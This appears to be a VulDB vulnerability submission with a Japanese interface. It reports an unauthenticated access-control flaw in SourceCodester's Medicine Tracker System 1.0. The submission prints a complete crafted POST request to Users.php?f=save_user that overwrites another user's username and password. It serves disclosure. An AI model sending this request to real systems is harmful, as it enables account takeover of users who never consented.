| タイトル | Medicine Tracker System Improper Access Control |
|---|
| 説明 | An Improper Access Control has beed discovered in Medicine Tracker System. A remote and unauthenticated attacker can exploit this vulnerability by sending a crafted request, successful exploitation could allow attakers to change any users username and password.
The vulneravle URI is POST /php-mts/classes/Users.php?f=save_user. When the value of ' name="id" ' is correct, then an attacker could change the related username ,password and other informations. Cookie is not necessary for this operation, which means attackers could exploit it without authentication.
An malicous request is below
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
**********************************************************
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="id"
2
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="firstname"
a
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="middlename"
b
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="lastname"
c
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="username"
foo
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="password"
foo123
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z--
Then the relevant user with id=2 will be set as foo/foo123 |
|---|
| ソース | ⚠️ https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html |
|---|
| ユーザー | WWesleywww (UID 43117) |
|---|
| 送信 | 2023年03月17日 09:18 (3 年 ago) |
|---|
| モデレーション | 2023年03月17日 12:19 (3 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 223311 [SourceCodester Medicine Tracker System 1.0 Users.php?f=save_user firstname/middlename/lastname/username/password 弱い認証] |
|---|
| ポイント | 20 |
|---|